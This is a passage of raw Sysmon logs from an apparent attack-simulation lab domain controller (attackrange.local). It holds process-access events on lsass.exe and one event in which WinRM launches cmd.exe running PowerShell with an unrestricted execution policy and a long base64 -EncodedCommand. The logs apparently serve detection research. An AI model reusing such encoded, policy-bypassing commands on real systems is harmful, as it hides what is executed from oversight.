EASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x80000000000000005719Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.489{D28789B6-7CE0-5FA1-2E01-000000008801}32841176C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005718Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.489{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005717Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.489{D28789B6-7CE0-5FA1-3001-000000008801}47404528C:\Windows\system32\conhost.exe{D28789B6-7CE0-5FA1-3101-000000008801}4240C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005716Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.489{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005715Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.489{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005714Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.489{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005713Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.489{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005712Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.489{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005711Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.489{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005710Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.489{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005709Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.489{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005708Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.489{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005707Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.489{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7CE0-5FA1-3101-000000008801}4240C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005706Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.489{D28789B6-7CE0-5FA1-2F01-000000008801}8844036C:\Windows\system32\WinrsHost.exe{D28789B6-7CE0-5FA1-3101-000000008801}4240C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fa39|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b 154100x80000000000000005705Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.493{D28789B6-7CE0-5FA1-3101-000000008801}4240C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CE0-5FA1-AF9E-0B0000000000}0xb9eaf0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CE0-5FA1-2F01-000000008801}884C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000005704Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.489{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005703Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.489{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005702Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.473{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005701Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.473{D28789B6-7C64-5FA1-1500-000000008801}13361488C:\Windows\system32\svchost.exe{D28789B6-7CE0-5FA1-2F01-000000008801}884C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000005700Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 